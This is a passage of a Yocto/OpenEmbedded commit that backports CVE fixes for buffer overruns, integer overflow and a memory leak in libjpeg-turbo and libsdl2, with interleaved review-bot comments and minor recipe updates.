+- my_merged_upsample_ptr upsample =
+- (my_merged_upsample_ptr)cinfo->upsample;
+- upsample->rows_to_go = cinfo->output_height - cinfo->output_scanline;
+- } else {
+- my_upsample_ptr upsample = (my_upsample_ptr)cinfo->upsample;
++ if (!master->using_merged_upsample)
+ upsample->rows_to_go = cinfo->output_height - cinfo->output_scanline;
+- }
+ return num_lines;
+ }
+
+@@ -585,13 +560,8 @@ jpeg_skip_scanlines(j_decompress_ptr cinfo, JDIMENSION num_lines)
+ * bit odd, since "rows_to_go" seems to be redundantly keeping track of
+ * output_scanline.
+ */
+- if (master->using_merged_upsample) {
+- my_merged_upsample_ptr upsample = (my_merged_upsample_ptr)cinfo->upsample;
++ if (!master->using_merged_upsample)
+ upsample->rows_to_go = cinfo->output_height - cinfo->output_scanline;
+- } else {
+- my_upsample_ptr upsample = (my_upsample_ptr)cinfo->upsample;
+- upsample->rows_to_go = cinfo->output_height - cinfo->output_scanline;
+- }
+
+ /* Always skip the requested number of lines. */
+ return num_lines;
+diff --git a/libjpeg.txt b/libjpeg.txt
+index c50cf90..c233ecb 100644
+--- a/libjpeg.txt
++++ b/libjpeg.txt
+@@ -3,7 +3,7 @@ USING THE IJG JPEG LIBRARY
+ This file was part of the Independent JPEG Group's software:
+ Copyright (C) 1994-2013, Thomas G. Lane, Guido Vollbeding.
+ libjpeg-turbo Modifications:
+-Copyright (C) 2010, 2014-2018, D. R. Commander.
++Copyright (C) 2010, 2014-2018, 2020, D. R. Commander.
+ Copyright (C) 2015, Google, Inc.
+ For conditions of distribution and use, see the accompanying README.ijg file.
+
+@@ -750,7 +750,9 @@ multiple rows in the JPEG image.
+
+ Suspending data sources are not supported by this function. Calling
+ jpeg_skip_scanlines() with a suspending data source will result in undefined
+-behavior.
++behavior. Two-pass color quantization is also not supported by this function.
++Calling jpeg_skip_scanlines() with two-pass color quantization enabled will
++result in an error.
+
+ jpeg_skip_scanlines() will not allow skipping past the bottom of the image. If
+ the value of num_lines is large enough to skip past the bottom of the image,
+--
+2.25.1
+
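Review bot: In the jpeg_skip_scanlines() hunk of jdapistd.c, `my_upsample_ptr upsample = (my_upsample_ptr)cinfo->upsample;` is now cast once at function scope, so the pointer carries the wrong struct type whenever merged upsampling is active. Every dereference visible in these hunks is guarded by `!master->using_merged_upsample`, but nothing at the declaration states that rule. A mistyped upsampler pointer is the same kind of defect the companion CVE-2020-35538-1 patch corrects in the merged upsamplers. I would add a comment at the declaration, `/* Valid only when !master->using_merged_upsample; the merged upsampler is a my_merged_upsample_ptr. */`. The function body continues outside the hunks shown, so unguarded uses elsewhere cannot be ruled out from here.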
diff --git a/meta/recipes-graphics/jpeg/files/CVE-2021-46822.patch b/meta/recipes-graphics/jpeg/files/CVE-2021-46822.patch
new file mode 100644
index 0000000000..68cf89e628
--- /dev/null
+++ b/meta/recipes-graphics/jpeg/files/CVE-2021-46822.patch
@@ -0,0 +1,133 @@
+From f35fd27ec641c42d6b115bfa595e483ec58188d2 Mon Sep 17 00:00:00 2001
+From: DRC <information@libjpeg-turbo.org>
+Date: Tue, 6 Apr 2021 12:51:03 -0500
+Subject: [PATCH] tjLoadImage: Fix issues w/loading 16-bit PPMs/PGMs
+
+- The PPM reader now throws an error rather than segfaulting (due to a
+ buffer overrun) if an application attempts to load a 16-bit PPM file
+ into a grayscale uncompressed image buffer. No known applications
+ allowed that (not even the test applications in libjpeg-turbo),
+ because that mode of operation was never expected to work and did not
+ work under any circumstances. (In fact, it was necessary to modify
+ TJBench in order to reproduce the issue outside of a fuzzing
+ environment.) This was purely a matter of making the library bow out
+ gracefully rather than crash if an application tries to do something
+ really stupid.
+
+- The PPM reader now throws an error rather than generating incorrect
+ pixels if an application attempts to load a 16-bit PGM file into an
+ RGB uncompressed image buffer.
+
+- The PPM reader now correctly loads 16-bit PPM files into extended
+ RGB uncompressed image buffers. (Previously it generated incorrect
+ pixels unless the input colorspace was JCS_RGB or JCS_EXT_RGB.)
+
+The only way that users could have potentially encountered these issues
+was through the tjLoadImage() function. cjpeg and TJBench were
+unaffected.
+
+CVE: CVE-2021-46822
+Upstream-Status: Backport [https://github.com/libjpeg-turbo/libjpeg-turbo/commit/f35fd27ec641c42d6b115bfa595e483ec58188d2.patch]
+Comment: Refreshed hunks from ChangeLog.md
+ Refreshed hunks from rdppm.c
+
+Signed-off-by: Bhabu Bindu <bhabu.bindu@kpit.com>
+
+---
+ ChangeLog.md | 10 ++++++++++
+ rdppm.c | 26 ++++++++++++++++++++------
+ 2 files changed, 30 insertions(+), 6 deletions(-)
+
+diff --git a/ChangeLog.md b/ChangeLog.md
+index 968969c6b..12e730a0e 100644
+--- a/ChangeLog.md
++++ b/ChangeLog.md
+@@ -44,6 +44,15 @@
+ that maximum value was less than 255. libjpeg-turbo 1.5.0 already included a
+ similar fix for binary PPM/PGM files with maximum values greater than 255.
+
++7. The PPM reader now throws an error, rather than segfaulting (due to a buffer
++overrun) or generating incorrect pixels, if an application attempts to use the
++`tjLoadImage()` function to load a 16-bit binary PPM file (a binary PPM file
++with a maximum value greater than 255) into a grayscale image buffer or to load
++a 16-bit binary PGM file into an RGB image buffer.
++
++8. Fixed an issue in the PPM reader that caused incorrect pixels to be
++generated when using the `tjLoadImage()` function to load a 16-bit binary PPM
++file into an extended RGB image buffer.
+
+ 2.0.3
+ =====
+diff --git a/rdppm.c b/rdppm.c
+index c4c937e8a..6ac8fdbf7 100644
+--- a/rdppm.c
++++ b/rdppm.c
+@@ -5,7 +5,7 @@
+ * Copyright (C) 1991-1997, Thomas G. Lane.
+ * Modified 2009 by Bill Allombert, Guido Vollbeding.
+ * libjpeg-turbo Modifications:
+- * Copyright (C) 2015-2017, 2020, D. R. Commander.
++ * Copyright (C) 2015-2017, 2020-2021, D. R. Commander.
+ * For conditions of distribution and use, see the accompanying README.ijg
+ * file.
+ *
+@@ -516,6 +516,11 @@ get_word_rgb_row(j_compress_ptr cinfo, cjpeg_source_ptr sinfo)
+ register JSAMPLE *rescale = source->rescale;
+ JDIMENSION col;
+ unsigned int maxval = source->maxval;
++ register int rindex = rgb_red[cinfo->in_color_space];
++ register int gindex = rgb_green[cinfo->in_color_space];
++ register int bindex = rgb_blue[cinfo->in_color_space];
++ register int aindex = alpha_index[cinfo->in_color_space];
++ register int ps = rgb_pixelsize[cinfo->in_color_space];
+
+ if (!ReadOK(source->pub.input_file, source->iobuffer, source->buffer_width))
+ ERREXIT(cinfo, JERR_INPUT_EOF);
+@@ -527,17 +532,20 @@ get_word_rgb_row(j_compress_ptr cinfo, cjpeg_source_ptr sinfo)
+ temp |= UCH(*bufferptr++);
+ if (temp > maxval)
+ ERREXIT(cinfo, JERR_PPM_OUTOFRANGE);
+- *ptr++ = rescale[temp];
++ ptr[rindex] = rescale[temp];
+ temp = UCH(*bufferptr++) << 8;
+ temp |= UCH(*bufferptr++);
+ if (temp > maxval)
+ ERREXIT(cinfo, JERR_PPM_OUTOFRANGE);
+- *ptr++ = rescale[temp];
++ ptr[gindex] = rescale[temp];
+ temp = UCH(*bufferptr++) << 8;
+ temp |= UCH(*bufferptr++);
+ if (temp > maxval)
+ ERREXIT(cinfo, JERR_PPM_OUTOFRANGE);
+- *ptr++ = rescale[temp];
++ ptr[bindex] = rescale[temp];
++ if (aindex >= 0)
++ ptr[aindex] = 0xFF;
++ ptr += ps;
+ }
+ return 1;
+ }
+@@ -624,7 +632,10 @@ start_input_ppm(j_compress_ptr cinfo, cjpeg_source_ptr sinfo)
+ cinfo->in_color_space = JCS_GRAYSCALE;
+ TRACEMS2(cinfo, 1, JTRC_PGM, w, h);
+ if (maxval > 255) {
+- source->pub.get_pixel_rows = get_word_gray_row;
++ if (cinfo->in_color_space == JCS_GRAYSCALE)
++ source->pub.get_pixel_rows = get_word_gray_row;
++ else
++ ERREXIT(cinfo, JERR_BAD_IN_COLORSPACE);
+ } else if (maxval == MAXJSAMPLE && sizeof(JSAMPLE) == sizeof(U_CHAR) &&
+ cinfo->in_color_space == JCS_GRAYSCALE) {
+ source->pub.get_pixel_rows = get_raw_row;
+@@ -657,7 +657,10 @@
+ cinfo->in_color_space = JCS_EXT_RGB;
+ TRACEMS2(cinfo, 1, JTRC_PPM, w, h);
+ if (maxval > 255) {
+- source->pub.get_pixel_rows = get_word_rgb_row;
++ if (IsExtRGB(cinfo->in_color_space))
++ source->pub.get_pixel_rows = get_word_rgb_row;
++ else
++ ERREXIT(cinfo, JERR_BAD_IN_COLORSPACE);
+ } else if (maxval == MAXJSAMPLE && sizeof(JSAMPLE) == sizeof(U_CHAR) &&
+ (cinfo->in_color_space == JCS_EXT_RGB
+ #if RGB_RED == 0 && RGB_GREEN == 1 && RGB_BLUE == 2 && RGB_PIXELSIZE == 3
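Review bot: get_word_rgb_row() now takes its write offsets (`rindex`, `gindex`, `bindex`, `aindex`) and the pixel stride `ps` from tables indexed by `cinfo->in_color_space`, and nothing inside the function checks that the colorspace is one those tables cover. The only guard visible is the `IsExtRGB(cinfo->in_color_space)` test added in the last rdppm.c hunk, which decides whether this row reader is installed at all. A comment at the top of the function would make that dependency explicit, for example `/* Caller guarantees IsExtRGB(cinfo->in_color_space); the index tables may not hold valid offsets for other colorspaces. */`. Both functions extend beyond the hunks shown.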
diff --git a/meta/recipes-graphics/jpeg/files/CVE-2023-2804-1.patch b/meta/recipes-graphics/jpeg/files/CVE-2023-2804-1.patch
new file mode 100644
index 0000000000..6668f6e41d
--- /dev/null
+++ b/meta/recipes-graphics/jpeg/files/CVE-2023-2804-1.patch
@@ -0,0 +1,97 @@
+From 9679473547874c472569d54fecce32b463999a9d Mon Sep 17 00:00:00 2001
+From: DRC <information@libjpeg-turbo.org>
+Date: Tue, 4 Apr 2023 19:06:20 -0500
+Subject: [PATCH] Decomp: Don't enable 2-pass color quant w/ RGB565
+
+The 2-pass color quantization algorithm assumes 3-sample pixels. RGB565
+is the only 3-component colorspace that doesn't have 3-sample pixels, so
+we need to treat it as a special case when determining whether to enable
+2-pass color quantization. Otherwise, attempting to initialize 2-pass
+color quantization with an RGB565 output buffer could cause
+prescan_quantize() to read from uninitialized memory and subsequently
+underflow/overflow the histogram array.
+
+djpeg is supposed to fail gracefully if both -rgb565 and -colors are
+specified, because none of its destination managers (image writers)
+support color quantization with RGB565. However, prescan_quantize() was
+called before that could occur. It is possible but very unlikely that
+these issues could have been reproduced in applications other than
+djpeg. The issues involve the use of two features (12-bit precision and
+RGB565) that are incompatible, and they also involve the use of two
+rarely-used legacy features (RGB565 and color quantization) that don't
+make much sense when combined.
+
+Fixes #668
+Fixes #671
+Fixes #680
+
+CVE: CVE-2023-2804
+Upstream-Status: Backport [https://github.com/libjpeg-turbo/libjpeg-turbo/commit/9679473547874c472569d54fecce32b463999a9d]
+
+Signed-off-by: Peter Marko <peter.marko@siemens.com>
+---
+ ChangeLog.md | 6 ++++++
+ jdmaster.c | 5 +++--
+ jquant2.c | 5 +++--
+ 3 files changed, 12 insertions(+), 4 deletions(-)
+
+diff --git a/ChangeLog.md b/ChangeLog.md
+index e605abe73..de0c4d0dd 100644
+--- a/ChangeLog.md
++++ b/ChangeLog.md
+@@ -1,3 +1,9 @@ quality values.
++9. Fixed an oversight in 1.4 beta1[8] that caused various segfaults and buffer
++overruns when attempting to decompress various specially-crafted malformed
++12-bit-per-component JPEG images using a 12-bit-per-component build of djpeg
++(`-DWITH_12BIT=1`) with both color quantization and RGB565 color conversion
++enabled.
++
+ 2.0.4
+ =====
+
+diff --git a/jdmaster.c b/jdmaster.c
+index b20906438..8d8ef9956 100644
+--- a/jdmaster.c
++++ b/jdmaster.c
+@@ -5,7 +5,7 @@
+ * Copyright (C) 1991-1997, Thomas G. Lane.
+ * Modified 2002-2009 by Guido Vollbeding.
+ * libjpeg-turbo Modifications:
+- * Copyright (C) 2009-2011, 2016, D. R. Commander.
++ * Copyright (C) 2009-2011, 2016, 2023, D. R. Commander.
+ * Copyright (C) 2013, Linaro Limited.
+ * Copyright (C) 2015, Google, Inc.
+ * For conditions of distribution and use, see the accompanying README.ijg
+@@ -492,7 +492,8 @@ master_selection(j_decompress_ptr cinfo)
+ if (cinfo->raw_data_out)
+ ERREXIT(cinfo, JERR_NOTIMPL);
+ /* 2-pass quantizer only works in 3-component color space. */
+- if (cinfo->out_color_components != 3) {
++ if (cinfo->out_color_components != 3 ||
++ cinfo->out_color_space == JCS_RGB565) {
+ cinfo->enable_1pass_quant = TRUE;
+ cinfo->enable_external_quant = FALSE;
+ cinfo->enable_2pass_quant = FALSE;
+diff --git a/jquant2.c b/jquant2.c
+index 6570613bb..c760380fb 100644
+--- a/jquant2.c
++++ b/jquant2.c
+@@ -4,7 +4,7 @@
+ * This file was part of the Independent JPEG Group's software:
+ * Copyright (C) 1991-1996, Thomas G. Lane.
+ * libjpeg-turbo Modifications:
+- * Copyright (C) 2009, 2014-2015, D. R. Commander.
++ * Copyright (C) 2009, 2014-2015, 2020, 2023, D. R. Commander.
+ * For conditions of distribution and use, see the accompanying README.ijg
+ * file.
+ *
+@@ -1230,7 +1230,8 @@ jinit_2pass_quantizer(j_decompress_ptr cinfo)
+ cquantize->error_limiter = NULL;
+
+ /* Make sure jdmaster didn't give me a case I can't handle */
+- if (cinfo->out_color_components != 3)
++ if (cinfo->out_color_components != 3 ||
++ cinfo->out_color_space == JCS_RGB565)
+ ERREXIT(cinfo, JERR_NOTIMPL);
+
+ /* Allocate the histogram/inverse colormap storage */
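Review bot: The comments above the two widened checks no longer describe them. In master_selection() the comment still reads `/* 2-pass quantizer only works in 3-component color space. */`, although RGB565 is a 3-component colorspace and is now excluded as well. Going by the patch description, the real requirement is 3-sample pixels, so I would reword it to `/* 2-pass quantizer needs 3-sample pixels; RGB565 has 3 components but not 3 samples per pixel. */` and say the same above the check in jinit_2pass_quantizer(). The condition is also written out twice, in jdmaster.c and jquant2.c, and each comment should mention the other so the two stay in step.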
diff --git a/meta/recipes-graphics/jpeg/files/CVE-2023-2804-2.patch b/meta/recipes-graphics/jpeg/files/CVE-2023-2804-2.patch
new file mode 100644
index 0000000000..bcba0b513d
--- /dev/null
+++ b/meta/recipes-graphics/jpeg/files/CVE-2023-2804-2.patch
@@ -0,0 +1,75 @@
+From 0deab87e24ab3106d5332205f829d1846fa65001 Mon Sep 17 00:00:00 2001
+From: DRC <information@libjpeg-turbo.org>
+Date: Thu, 6 Apr 2023 18:33:41 -0500
+Subject: [PATCH] jpeg_crop_scanline: Fix calc w/sclg + 2x4,4x2 samp
+
+When computing the downsampled width for a particular component,
+jpeg_crop_scanline() needs to take into account the fact that the
+libjpeg code uses a combination of IDCT scaling and upsampling to
+implement 4x2 and 2x4 upsampling with certain decompression scaling
+factors. Failing to account for that led to incomplete upsampling of
+4x2- or 2x4-subsampled components, which caused the color converter to
+read from uninitialized memory. With 12-bit data precision, this caused
+a buffer overrun or underrun and subsequent segfault if the
+uninitialized memory contained a value that was outside of the valid
+sample range (because the color converter uses the value as an array
+index.)
+
+Fixes #669
+
+CVE: CVE-2023-2804
+Upstream-Status: Backport [https://github.com/libjpeg-turbo/libjpeg-turbo/commit/0deab87e24ab3106d5332205f829d1846fa65001]
+
+Signed-off-by: Peter Marko <peter.marko@siemens.com>
+---
+ ChangeLog.md | 8 ++++++++
+ jdapistd.c | 10 ++++++----
+ 2 files changed, 14 insertions(+), 4 deletions(-)
+
+diff --git a/ChangeLog.md b/ChangeLog.md
+index de0c4d0dd..159bd1610 100644
+--- a/ChangeLog.md
++++ b/ChangeLog.md
+@@ -4,6 +4,14 @@ overruns when attempting to decompress various specially-crafted malformed
+ (`-DWITH_12BIT=1`) with both color quantization and RGB565 color conversion
+ enabled.
+
++10. Fixed an issue whereby `jpeg_crop_scanline()` sometimes miscalculated the
++downsampled width for components with 4x2 or 2x4 subsampling factors if
++decompression scaling was enabled. This caused the components to be upsampled
++incompletely, which caused the color converter to read from uninitialized
++memory. With 12-bit data precision, this caused a buffer overrun or underrun
++and subsequent segfault if the sample value read from unitialized memory was
++outside of the valid sample range.
++
+ 2.0.4
+ =====
+
+diff --git a/jdapistd.c b/jdapistd.c
+index 628626254..eb577928c 100644
+--- a/jdapistd.c
++++ b/jdapistd.c
+@@ -4,7 +4,7 @@
+ * This file was part of the Independent JPEG Group's software:
+ * Copyright (C) 1994-1996, Thomas G. Lane.
+ * libjpeg-turbo Modifications:
+- * Copyright (C) 2010, 2015-2018, 2020, D. R. Commander.
++ * Copyright (C) 2010, 2015-2018, 2020, 2023, D. R. Commander.
+ * Copyright (C) 2015, Google, Inc.
+ * For conditions of distribution and use, see the accompanying README.ijg
+ * file.
+@@ -225,9 +225,11 @@ jpeg_crop_scanline(j_decompress_ptr cinfo, JDIMENSION *xoffset,
+ /* Set downsampled_width to the new output width. */
+ orig_downsampled_width = compptr->downsampled_width;
+ compptr->downsampled_width =
+- (JDIMENSION)jdiv_round_up((long)(cinfo->output_width *
+- compptr->h_samp_factor),
+- (long)cinfo->max_h_samp_factor);
++ (JDIMENSION)jdiv_round_up((long)cinfo->output_width *
++ (long)(compptr->h_samp_factor *
++ compptr->_DCT_scaled_size),
++ (long)(cinfo->max_h_samp_factor *
++ cinfo->_min_DCT_scaled_size));
+ if (compptr->downsampled_width < 2 && orig_downsampled_width >= 2)
+ reinit_upsampler = TRUE;
+
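Review bot: The rewritten `jdiv_round_up()` call in jpeg_crop_scanline() does not explain why the DCT scaled sizes now enter the ratio; the comment above it still says only `/* Set downsampled_width to the new output width. */`. The patch description gives the reason: 4x2 and 2x4 upsampling is split between IDCT scaling and the upsampler, and leaving that out caused incomplete upsampling and reads from uninitialized memory. I would extend the comment to `/* Scale by the per-component IDCT ratio as well: 4x2/2x4 upsampling is split between IDCT scaling and the upsampler. */`. jpeg_crop_scanline() starts and ends outside the hunk.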
diff --git a/meta/recipes-graphics/jpeg/libjpeg-turbo_2.0.4.bb b/meta/recipes-graphics/jpeg/libjpeg-turbo_2.0.4.bb
index 3005a8a789..fda425c219 100644
--- a/meta/recipes-graphics/jpeg/libjpeg-turbo_2.0.4.bb
+++ b/meta/recipes-graphics/jpeg/libjpeg-turbo_2.0.4.bb
@@ -13,6 +13,11 @@ DEPENDS_append_x86_class-target = " nasm-native"
SRC_URI = "${SOURCEFORGE_MIRROR}/${BPN}/${BPN}-${PV}.tar.gz \
file://0001-libjpeg-turbo-fix-package_qa-error.patch \
file://CVE-2020-13790.patch \
+ file://CVE-2021-46822.patch \
+ file://CVE-2020-35538-1.patch \
+ file://CVE-2020-35538-2.patch \
+ file://CVE-2023-2804-1.patch \
+ file://CVE-2023-2804-2.patch \
"
SRC_URI[md5sum] = "d01d9e0c28c27bc0de9f4e2e8ff49855"
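Review bot: The order of the new SRC_URI entries is load-bearing but nothing documents it. CVE-2021-46822.patch has to be applied before CVE-2020-35538-2.patch, because the ChangeLog.md hunk in the latter uses as context the `tjLoadImage()` entry about extended RGB image buffers that the former adds. The list as written is in the right order. A header line in CVE-2020-35538-2.patch such as `Comment: Apply after CVE-2021-46822.patch (ChangeLog.md context)` would keep a later cleanup from sorting the entries by CVE number and breaking the apply step.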
diff --git a/meta/recipes-graphics/kmscube/kmscube_git.bb b/meta/recipes-graphics/kmscube/kmscube_git.bb
index a1a295f660..0aae6df357 100644
--- a/meta/recipes-graphics/kmscube/kmscube_git.bb
+++ b/meta/recipes-graphics/kmscube/kmscube_git.bb
@@ -1,4 +1,8 @@
-DESCRIPTION = "Demo application to showcase 3D graphics using kms and gbm"
+SUMMARY = "Demo application to showcase 3D graphics using kms and gbm"
+DESCRIPTION = "kmscube is a little demonstration program for how to drive bare metal graphics \
+without a compositor like X11, wayland or similar, using DRM/KMS (kernel mode \
+setting), GBM (graphics buffer manager) and EGL for rendering content using \
+OpenGL or OpenGL ES."
HOMEPAGE = "https://cgit.freedesktop.org/mesa/kmscube/"
LICENSE = "MIT"
SECTION = "graphics"
diff --git a/meta/recipes-graphics/libfakekey/libfakekey_git.bb b/meta/recipes-graphics/libfakekey/libfakekey_git.bb
index ab6f5ac9ed..33ea6fe5a9 100644
--- a/meta/recipes-graphics/libfakekey/libfakekey_git.bb
+++ b/meta/recipes-graphics/libfakekey/libfakekey_git.bb
@@ -13,7 +13,7 @@ SECTION = "x11/wm"
SRCREV = "7ad885912efb2131e80914e964d5e635b0d07b40"
PV = "0.3+git${SRCPV}"
-SRC_URI = "git://git.yoctoproject.org/${BPN}"
+SRC_URI = "git://git.yoctoproject.org/${BPN};branch=master"
S = "${WORKDIR}/git"
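Review bot: The changed `SRC_URI` adds `branch=master` but leaves the fetch on the plain `git://` transport, which provides no server authentication or encryption; the libmatchbox recipe in the next hunk has the same line. `SRCREV` pins the commit, so the fetched tree is still tied to that hash, but an authenticated transport removes the reliance on that alone. I would write `SRC_URI = "git://git.yoctoproject.org/${BPN};branch=master;protocol=https"` in both recipes.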
diff --git a/meta/recipes-graphics/libmatchbox/libmatchbox_1.12.bb b/meta/recipes-graphics/libmatchbox/libmatchbox_1.12.bb
index 1a31677978..06bd682823 100644
--- a/meta/recipes-graphics/libmatchbox/libmatchbox_1.12.bb
+++ b/meta/recipes-graphics/libmatchbox/libmatchbox_1.12.bb
@@ -17,7 +17,7 @@ DEPENDS = "virtual/libx11 libxext"
#SRCREV for 1.12
SRCREV = "e846ee434f8e23d9db38af13c523f791495e0e87"
-SRC_URI = "git://git.yoctoproject.org/${BPN}"
+SRC_URI = "git://git.yoctoproject.org/${BPN};branch=master"
S = "${WORKDIR}/git"
diff --git a/meta/recipes-graphics/libsdl2/libsdl2/CVE-2020-14409-14410.patch b/meta/recipes-graphics/libsdl2/libsdl2/CVE-2020-14409-14410.patch
new file mode 100644
index 0000000000..d8fa24bc65
--- /dev/null
+++ b/meta/recipes-graphics/libsdl2/libsdl2/CVE-2020-14409-14410.patch
@@ -0,0 +1,79 @@
+From a7ff6e96155f550a5597621ebeddd03c98aa9294 Mon Sep 17 00:00:00 2001
+From: Sam Lantinga <slouken@libsdl.org>
+Date: Wed, 17 Jun 2020 08:44:45 -0700
+Subject: [PATCH] Fixed overflow in surface pitch calculation
+
+
+Upstream-Status: Backport
+[https://github.com/libsdl-org/SDL/commit/a7ff6e96155f550a5597621ebeddd03c98aa9294]
+CVE: CVE-2020-14409 CVE-2020-14410
+Signed-off-by: Chee Yang Lee <chee.yang.lee@intel.com>
+
+---
+ src/video/SDL_surface.c | 23 +++++++++++++++--------
+ 1 file changed, 15 insertions(+), 8 deletions(-)
+
+diff --git a/src/video/SDL_surface.c b/src/video/SDL_surface.c
+index 085d9ff1e..bff826f7c 100644
+--- a/src/video/SDL_surface.c
++++ b/src/video/SDL_surface.c
+@@ -28,24 +28,23 @@
+ #include "SDL_yuv_c.h"
+
+
+-/* Check to make sure we can safely check multiplication of surface w and pitch and it won't overflow size_t */
+-SDL_COMPILE_TIME_ASSERT(surface_size_assumptions,
+- sizeof(int) == sizeof(Sint32) && sizeof(size_t) >= sizeof(Sint32));
++/* Check to make sure we can safely check multiplication of surface w and pitch and it won't overflow Sint64 */
++SDL_COMPILE_TIME_ASSERT(surface_size_assumptions, sizeof(int) == sizeof(Sint32));
+
+ /* Public routines */
+
+ /*
+ * Calculate the pad-aligned scanline width of a surface
+ */
+-static int
++static Sint64
+ SDL_CalculatePitch(Uint32 format, int width)
+ {
+- int pitch;
++ Sint64 pitch;
+
+ if (SDL_ISPIXELFORMAT_FOURCC(format) || SDL_BITSPERPIXEL(format) >= 8) {
+- pitch = (width * SDL_BYTESPERPIXEL(format));
++ pitch = ((Sint64)width * SDL_BYTESPERPIXEL(format));
+ } else {
+- pitch = ((width * SDL_BITSPERPIXEL(format)) + 7) / 8;
++ pitch = (((Sint64)width * SDL_BITSPERPIXEL(format)) + 7) / 8;
+ }
+ pitch = (pitch + 3) & ~3; /* 4-byte aligning for speed */
+ return pitch;
+@@ -59,11 +58,19 @@ SDL_Surface *
+ SDL_CreateRGBSurfaceWithFormat(Uint32 flags, int width, int height, int depth,
+ Uint32 format)
+ {
++ Sint64 pitch;
+ SDL_Surface *surface;
+
+ /* The flags are no longer used, make the compiler happy */
+ (void)flags;
+
++ pitch = SDL_CalculatePitch(format, width);
++ if (pitch < 0 || pitch > SDL_MAX_SINT32) {
++ /* Overflow... */
++ SDL_OutOfMemory();
++ return NULL;
++ }
++
+ /* Allocate the surface */
+ surface = (SDL_Surface *) SDL_calloc(1, sizeof(*surface));
+ if (surface == NULL) {
+@@ -78,7 +85,7 @@ SDL_CreateRGBSurfaceWithFormat(Uint32 flags, int width, int height, int depth,
+ }
+ surface->w = width;
+ surface->h = height;
+- surface->pitch = SDL_CalculatePitch(format, width);
++ surface->pitch = (int)pitch;
+ SDL_SetClipRect(surface, NULL);
+
+ if (SDL_ISPIXELFORMAT_INDEXED(surface->format->format)) {
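Review bot: SDL_CalculatePitch now returns Sint64, but its header comment still reads only "Calculate the pad-aligned scanline width of a surface", so nothing tells a caller that the result must be range-checked before it is narrowed to the int `surface->pitch`. The one caller in this patch does that check before allocating; any other caller in SDL_surface.c is outside these hunks and should be confirmed against the 2.0.12 tree. I would extend the comment to something like `/* Returns Sint64 so the multiplication cannot wrap; callers must reject values outside 0..SDL_MAX_SINT32 before storing into an int */`.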
diff --git a/meta/recipes-graphics/libsdl2/libsdl2/CVE-2021-33657.patch b/meta/recipes-graphics/libsdl2/libsdl2/CVE-2021-33657.patch
new file mode 100644
index 0000000000..a4ed7ab8e6
--- /dev/null
+++ b/meta/recipes-graphics/libsdl2/libsdl2/CVE-2021-33657.patch
@@ -0,0 +1,38 @@
+From 8c91cf7dba5193f5ce12d06db1336515851c9ee9 Mon Sep 17 00:00:00 2001
+From: Sam Lantinga <slouken@libsdl.org>
+Date: Tue, 30 Nov 2021 12:36:46 -0800
+Subject: [PATCH] Always create a full 256-entry map in case color values are
+ out of range
+
+Fixes https://github.com/libsdl-org/SDL/issues/5042
+
+CVE: CVE-2021-33657
+Upstream-Status: Backport [https://github.com/libsdl-org/SDL/commit/8c91cf7dba5193f5ce12d06db1336515851c9ee9.patch]
+Signed-off-by: Ranjitsinh Rathod <ranjitsinh.rathod@kpit.com>
+
+---
+ src/video/SDL_pixels.c | 4 ++--
+ 1 file changed, 2 insertions(+), 2 deletions(-)
+
+diff --git a/src/video/SDL_pixels.c b/src/video/SDL_pixels.c
+index ac04533c5d5..9bb02f771d0 100644
+--- a/src/video/SDL_pixels.c
++++ b/src/video/SDL_pixels.c
+@@ -947,7 +947,7 @@ Map1to1(SDL_Palette * src, SDL_Palette * dst, int *identical)
+ }
+ *identical = 0;
+ }
+- map = (Uint8 *) SDL_malloc(src->ncolors);
++ map = (Uint8 *) SDL_calloc(256, sizeof(Uint8));
+ if (map == NULL) {
+ SDL_OutOfMemory();
+ return (NULL);
+@@ -971,7 +971,7 @@ Map1toN(SDL_PixelFormat * src, Uint8 Rmod, Uint8 Gmod, Uint8 Bmod, Uint8 Amod,
+ SDL_Palette *pal = src->palette;
+
+ bpp = ((dst->BytesPerPixel == 3) ? 4 : dst->BytesPerPixel);
+- map = (Uint8 *) SDL_malloc(pal->ncolors * bpp);
++ map = (Uint8 *) SDL_calloc(256, bpp);
+ if (map == NULL) {
+ SDL_OutOfMemory();
+ return (NULL);
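Review bot: The fixed 256-entry allocation in Map1to1 and Map1toN is only safe if the loops that fill `map` never index past 255, and those loops are outside both hunks. If they still iterate up to `src->ncolors` and `pal->ncolors`, a palette with more than 256 entries would write past the buffer, whereas the old allocation was sized by ncolors. Confirm this against the 2.0.12 source. If the loops are unbounded, size by the larger value, e.g. `map = (Uint8 *) SDL_calloc(SDL_max(256, src->ncolors), sizeof(Uint8));` and the equivalent with `bpp` in Map1toN.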
diff --git a/meta/recipes-graphics/libsdl2/libsdl2/CVE-2022-4743.patch b/meta/recipes-graphics/libsdl2/libsdl2/CVE-2022-4743.patch
new file mode 100644
index 0000000000..b02a2169a6
--- /dev/null
+++ b/meta/recipes-graphics/libsdl2/libsdl2/CVE-2022-4743.patch
@@ -0,0 +1,38 @@
+From 00b67f55727bc0944c3266e2b875440da132ce4b Mon Sep 17 00:00:00 2001
+From: zhailiangliang <zhailiangliang@loongson.cn>
+Date: Wed, 21 Sep 2022 10:30:38 +0800
+Subject: [PATCH] Fix potential memory leak in GLES_CreateTexture
+
+
+CVE: CVE-2022-4743
+Upstream-Status: Backport [https://github.com/libsdl-org/SDL/commit/00b67f55727bc0944c3266e2b875440da132ce4b.patch]
+Signed-off-by: Ranjitsinh Rathod <ranjitsinh.rathod@kpit.com>
+
+---
+ src/render/opengles/SDL_render_gles.c | 6 ++++++
+ 1 file changed, 6 insertions(+)
+
+diff --git a/src/render/opengles/SDL_render_gles.c b/src/render/opengles/SDL_render_gles.c
+index a5fbab309eda..ba08a46e2805 100644
+--- a/src/render/opengles/SDL_render_gles.c
++++ b/src/render/opengles/SDL_render_gles.c
+@@ -359,6 +359,9 @@ GLES_CreateTexture(SDL_Renderer * renderer, SDL_Texture * texture)
+ renderdata->glGenTextures(1, &data->texture);
+ result = renderdata->glGetError();
+ if (result != GL_NO_ERROR) {
++ if (texture->access == SDL_TEXTUREACCESS_STREAMING) {
++ SDL_free(data->pixels);
++ }
+ SDL_free(data);
+ return GLES_SetError("glGenTextures()", result);
+ }
+@@ -387,6 +390,9 @@ GLES_CreateTexture(SDL_Renderer * renderer, SDL_Texture * texture)
+
+ result = renderdata->glGetError();
+ if (result != GL_NO_ERROR) {
++ if (texture->access == SDL_TEXTUREACCESS_STREAMING) {
++ SDL_free(data->pixels);
++ }
+ SDL_free(data);
+ return GLES_SetError("glTexImage2D()", result);
+ }
diff --git a/meta/recipes-graphics/libsdl2/libsdl2_2.0.12.bb b/meta/recipes-graphics/libsdl2/libsdl2_2.0.12.bb
index 1049aa548a..fa29bc99ac 100644
